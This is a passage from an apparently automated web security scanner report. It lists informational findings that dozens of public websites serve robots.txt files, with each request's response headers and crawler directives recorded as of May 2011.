Host:   http://www.blogdelnarco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogdelnarco.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Expires: Wed, 04 May 2011 22:32:34 GMT
Date: Tue, 03 May 2011 22:32:34 GMT
Last-Modified: Tue, 03 May 2011 18:52:06 GMT
ETag: "fa7aa991-094f-4930-a736-1561b1667c93"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400, proxy-revalidate, must-revalidate
Age: 11590

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /search
Disallow: /related-content.g
Disallow: /related_content_helper.html

Sitemap: http://www.blogdelnarco.com/feeds/posts/defau
...[SNIP]...

27.228. http://www.blogdrive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogdrive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogdrive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:23 GMT
Server: Apache
Last-Modified: Tue, 07 Oct 2003 00:13:39 GMT
ETag: "1112125-71-3f820533"
Accept-Ranges: bytes
Content-Length: 113
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /apps/authors
Disallow: /apps/notifications
Disallow: /apps/password
Disallow: /images/


27.229. http://www.blogia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:57:45 GMT
Server: Apache/2.0.53 (Fedora)
Last-Modified: Mon, 01 Mar 2010 11:55:00 GMT
ETag: "284ebe-2d-eb31ed00"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Mediapartners-Google*
Disallow:


27.230. http://www.bloglander.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloglander.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloglander.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:25 GMT
Server: Apache
Last-Modified: Wed, 14 Apr 2010 14:55:22 GMT
ETag: "1155c010-3eb-4843391410a80"
Accept-Ranges: bytes
Content-Length: 1003
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /overture/

Disallow: /cheapeats/wp-images/
Disallow: /cheapeats/wp-includes/
Disallow: /cheapeats/disclaimer/

Disallow: /jewelrymaking/wp-images/
Disallow: /jewelryma
...[SNIP]...

27.231. http://www.blogspace.fr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogspace.fr
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blogspace.fr

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:00 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 16 Mar 2009 15:34:25 GMT
ETag: "15ad099-59-4653e2f6ea240"
Accept-Ranges: bytes
Content-Length: 89
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /compte
Disallow: /lib
Disallow: /admin
Disallow: /moderation

27.232. http://www.bloodytrailers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloodytrailers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloodytrailers.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 01:03:53 GMT
Content-Type: text/plain
Content-Length: 154
Last-Modified: Wed, 02 Jun 2010 18:52:41 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /media/cached/
Disallow: /admin/
Disallow: /includes/
Disallow: /iframes/
Sitemap: http://www.bloodytrailers.com/sitemaps.xml

27.233. http://www.bluebeat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluebeat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluebeat.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 04 May 2011 04:12:18 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 11 Feb 2011 02:46:57 GMT
ETag: "212815d-1fb-49bf8b6264a40"
Accept-Ranges: bytes
Content-Length: 507

User-agent: *
Disallow: /account/
Disallow: /action/
Disallow: /ads/
Disallow: /aj/
Disallow: /cgi-bin/
Disallow: /crates/
Disallow: /download/
Disallow: /favorites/
Disallow: /fb_cd/
Disallow: /fbcre
...[SNIP]...

27.234. http://www.bluecrossma.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluecrossma.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluecrossma.com

Response

HTTP/1.1 200 OK
Server: "Web Server"
Date: Wed, 04 May 2011 01:41:58 GMT
Content-type: text/plain
Last-modified: Thu, 17 Feb 2011 19:28:26 GMT
Content-length: 1024
Etag: "400-4d5d76da"
Accept-ranges: bytes
Connection: keep-alive
Set-Cookie: NSC_MCW-Cmvfdspttnb.dpn=4481ff3a29a1;Version=1;path=/

User-agent: *

Allow: /nm/healthcarebasics/
Disallow: /service/
Disallow: /boomer365/
Disallow: /give-the-gift/
Disallow: /Medicare/
Disallow: /nm/
Disallow: /microsites/
Disallow: /municipal
...[SNIP]...

27.235. http://www.blueskycycling.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blueskycycling.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.blueskycycling.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:57 GMT
Server: Apache/1.3.42 (Unix) PHP/4.4.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Sat, 20 Nov 2004 20:45:35 GMT
ETag: "22f5911-22-419facef"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /test/


27.236. http://www.bluhomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluhomes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bluhomes.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 03:48:57 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-jhaghgkk=EB4F3E5CBF68DDC0A9CE9BA4D116D1BF; path=/
Last-Modified: Thu, 29 Apr 2010 18:44:31 GMT
Content-Length: 507

...User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disal
...[SNIP]...

27.237. http://www.bmi.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmi.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bmi.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:38 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 18:22:56 GMT
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.238. http://www.bnl.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnl.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bnl.gov

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Length: 557
Content-Type: text/plain
Last-Modified: Fri, 22 Oct 2010 14:11:33 GMT
Accept-Ranges: bytes
ETag: "20cfd47f371cb1:e838"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:38:43 GMT
Age: 880
X-Cache: HIT from cache3.bnl.gov
Via: 1.0 cache3.bnl.gov (squid)
Connection: close

User-agent: *
Disallow: /WebResource.axd
Disallow: /nndcmigration/
Disallow: /nrr/
Disallow: /bnlweb/pubaf/pr/2004/
Disallow: /errorpages/
Disallow: /BNL_ONLY/
Disallow: /download/
Disallow: /
...[SNIP]...

27.239. http://www.bobthebuilder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bobthebuilder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bobthebuilder.com

Response

HTTP/1.0 200 OK
Content-Length: 100
Content-Type: text/plain
Last-Modified: Mon, 12 Sep 2005 10:26:03 GMT
Accept-Ranges: bytes
ETag: "58b19c6084b7c51:131a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:38:15 GMT
Connection: close

# Robots.txt file from http://
#
# All robots will spider the domain

User-agent: *
Disallow:

27.240. http://www.bodenusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bodenusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bodenusa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n33 ( iad-agg-n28), ht-d iad-agg-n28.panthercdn.com
ETag: "0b9def1a5c6cb1:0"
Cache-Control: max-age=604800
Expires: Mon, 09 May 2011 12:01:46 GMT
Age: 141293
Content-Length: 349
Content-Type: text/plain
Last-Modified: Mon, 07 Feb 2011 09:03:54 GMT
bServerID: 12
Connection: close

User-agent: *
Disallow: /JavaScript/
Disallow: /styles/
Disallow: /*?Add=
Disallow: /*.axd$
Disallow: /pressoffice/
Disallow: /SLITemplate.aspx
Disallow: /ClientControl/
Disallow: /ClientContr
...[SNIP]...

27.241. http://www.body-jewelry-shop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.body-jewelry-shop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.body-jewelry-shop.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:58:43 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 17:28:03 GMT
ETag: "11908f-18-fefd4ec0"
Accept-Ranges: bytes
Content-Length: 24
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /


27.242. http://www.bodybuildingdungeon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bodybuildingdungeon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bodybuildingdungeon.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:34:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Dec 2010 16:50:50 GMT
ETag: "1a4934d-1e2-496c0b0be6e80"
Accept-Ranges: bytes
Content-Length: 482
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /forums/es/
Disallow: /sendmessage
Disallow: /register
Disallow: /login
Disallow: /newreply
Disallow: /subscription
Disallow: /private
Disallow: /misc
Disallow: /repor
...[SNIP]...

27.243. http://www.boltsfromtheblue.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boltsfromtheblue.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boltsfromtheblue.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:51 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:40 GMT
ETag: "5601ba-d0-49e83f7b0eac5"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.244. http://www.bombaxo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bombaxo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bombaxo.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:09:03 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-anhnedcp=C070862A895B6A93BA2B02AA0B6B9B14; path=/
Last-Modified: Fri, 24 Sep 2010 00:23:10 GMT
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Length: 23

User-agent: *
Disallow:

27.245. http://www.bookingcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookingcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bookingcenter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.6
Last-Modified: Tue, 17 Jul 2001 09:37:25 GMT
ETag: "101844d-20-38946ece0bf40"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /store

27.246. http://www.boomboomflicks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boomboomflicks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boomboomflicks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Thu, 09 Dec 2010 21:08:46 GMT
ETag: "22417f0-26-49700a4b93ecd"
Accept-Ranges: bytes
Content-Length: 38
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/atx/

27.247. http://www.brainreactions.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brainreactions.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brainreactions.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:32:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Feb 2011 12:28:53 GMT
ETag: "32b0492-cc-b976cb40"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.248. http://www.brainshark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brainshark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brainshark.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Tue, 19 Apr 2011 16:32:36 GMT
Accept-Ranges: bytes
ETag: "afd3c64affecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:26:53 GMT
Connection: close
Content-Length: 355

User-agent: *
Disallow: /m/newsletters/
Disallow: /m/components/
Disallow: /m/SupportCenter/
Disallow: /m/supportcenter/
Disallow: /brainshark/
Disallow: /imagecontent/
Disallow:
...[SNIP]...

27.249. http://www.brandonsun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brandonsun.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brandonsun.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 03:19:50 GMT
X-Server-Name: dv-c1-r1-u7-b5
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 03:19:51 GMT
Content-Length: 55
Connection: close
Set-Cookie: click_mobile=0
X-N: S

User-agent: *
Disallow:/search
Disallow:/searchresults

27.250. http://www.brandsoftheworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brandsoftheworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brandsoftheworld.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:10 GMT
Server: Apache
Last-Modified: Wed, 01 Sep 2010 18:58:12 GMT
ETag: "2225aa-638-48f37477a1900"
Accept-Ranges: bytes
Content-Length: 1592
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.251. http://www.bravocompanyusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bravocompanyusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bravocompanyusa.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Tue, 20 Apr 2010 15:51:33 GMT
Accept-Ranges: bytes
ETag: "6429ec59a1e0ca1:1c31"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:54:56 GMT
Connection: close

# robots.txt for search engines

User-agent:*
Disallow: /cgi-bin/

27.252. http://www.breastfeeding.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.breastfeeding.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.breastfeeding.com

Response

HTTP/1.1 200 OK
Age: 61
Date: Wed, 04 May 2011 03:36:33 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
ETag: "1913f8-65-46544b5049300"
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 16 Mar 2009 23:21:16 GMT
Accept-Ranges: bytes
Content-Length: 101
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /include/
Disallow: /design/
Disallow: /plugins/
Disallow: /site/



27.253. http://www.breederscup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.breederscup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.breederscup.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 17 Aug 2010 17:14:15 GMT
Accept-Ranges: bytes
ETag: "42dd759e2f3ecb1:29e"
Server: Microsoft-IIS/6.0
Farm: 233
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:49:24 GMT
Content-Length: 59
Connection: close
Via: 1.1 AN-0016020121270012

User-agent: *
Disallow: /content.aspx?type=*
Allow: /


27.254. http://www.brenhambanner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brenhambanner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brenhambanner.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Wed, 04 May 2011 03:47:38 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: brenhambanner.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

27.255. http://www.bricklink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bricklink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bricklink.com

Response

HTTP/1.1 200 OK
Content-Length: 47
Content-Type: text/plain
Last-Modified: Mon, 12 Aug 2002 07:28:26 GMT
Accept-Ranges: bytes
ETag: "089bcd8d141c21:675"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:21 GMT
Connection: close

User-agent: *
Allow: index.asp
Disallow: /

27.256. http://www.bridalshowergamesatoz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bridalshowergamesatoz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bridalshowergamesatoz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 28 Feb 2011 21:41:07 GMT
ETag: "35c4084-69-49d5e898c42c0"
Accept-Ranges: bytes
Content-Length: 105
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /?route=module/addCartPopup/add/category
Disallow: /affiliates/image/*


27.257. http://www.brightscope.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brightscope.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brightscope.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:46:53 GMT
Content-Type: text/plain
Content-Length: 371
Last-Modified: Fri, 25 Feb 2011 00:56:59 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /isloggedin/
Disallow: /settings/save/personalinfo/
Disallow: /settings/save/password/
Disallow: /settings/save/pref/
Disallow: /settings/remove/pref/
Disallow: /settings/track
...[SNIP]...

27.258. http://www.brightstorm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brightstorm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brightstorm.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.6
Last-Modified: Thu, 08 Jul 2010 16:02:32 GMT
ETag: "2e2671-27d-48ae269f8d600"
Accept-Ranges: bytes
Content-Length: 637
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /academic-trivia/
Disallow: /profile/
Disallow: /course/landing/
Disallow: /register/register/
Disallow: /swf/
Disallow: /search/
Disallow: /d/math/s/algebra-2/u/inverse
...[SNIP]...

27.259. http://www.brightwurks.com/monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brightwurks.com
Path:   /monitor/76246353061db9d2b69ec5f5450fc29ac0efff78/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brightwurks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:14 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Sat, 18 Apr 2009 21:11:07 GMT
ETag: "3da4e1-39a-467dabc5410c0"
Accept-Ranges: bytes
Content-Length: 922
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Language: en-US

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

27.260. http://www.brinksinc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brinksinc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brinksinc.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 27
Date: Wed, 04 May 2011 00:46:00 GMT
Content-Type: text/plain
ETag: "539921cca56cc1:0"
Server: Microsoft-IIS/7.5
Accept-Ranges: bytes
Last-Modified: Fri, 29 Apr 2011 19:44:05 GMT
X-Powered-By: ASP.NET

User-Agent: *
Allow: /


27.261. http://www.browardlibrary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.browardlibrary.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.browardlibrary.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:57 GMT
Server: Apache
Last-Modified: Mon, 12 Sep 2005 14:17:12 GMT
ETag: "15b086a-49-c8914a00"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /bcl-bin/
Disallow: /cgi-bin/
Disallow: /wc-bin/

27.262. http://www.buckmasters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buckmasters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buckmasters.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 May 2010 13:44:24 GMT
Accept-Ranges: bytes
ETag: "e95a82b9ebf8ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:23 GMT
Connection: close
Content-Length: 489

User-agent: *
Disallow: /Admin/
Disallow: /App_Browser/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /App_GlobalResources/
Disallow: /bin/
Disallow: /Components/
Disallow: /Config/
Dis
...[SNIP]...

27.263. http://www.buitoni.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buitoni.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buitoni.com

Response

HTTP/1.0 200 OK
Content-Length: 66
Content-Type: text/plain
Last-Modified: Tue, 12 Apr 2011 18:41:21 GMT
Accept-Ranges: bytes
ETag: "8f46e53741f9cb1:508f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:16:27 GMT
Connection: close

...User-agent: *
Disallow: /ContentRender.ashx
Disallow: /*.ashx

27.264. http://www.bullwrinkle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bullwrinkle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bullwrinkle.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:28 GMT
Server: Apache
Last-Modified: Mon, 14 Apr 2008 18:52:09 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 260
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /email/
Disallow: /Templates/
Disallow: /test/
Disallow: /Libary/
Disallow: /Assets/Backgrounds/
Disallow: /Assets/Buttons/
Disallow: /Assets/Backgrounds/Flash Objects/
Disallo
...[SNIP]...

27.265. http://www.business-standard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business-standard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.business-standard.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:12 GMT
Server: Apache
Last-Modified: Thu, 17 Feb 2011 12:50:19 GMT
ETag: "184556e-7c-49c79d70138c0"
Accept-Ranges: bytes
Content-Length: 124
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /india/backend/
Disallow: /ads/
Disallow: /backend/
Disallow: /bsmotoring/
Disallow: /bspanel/

27.266. http://www.busytrade.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.busytrade.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.busytrade.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:49:13 GMT
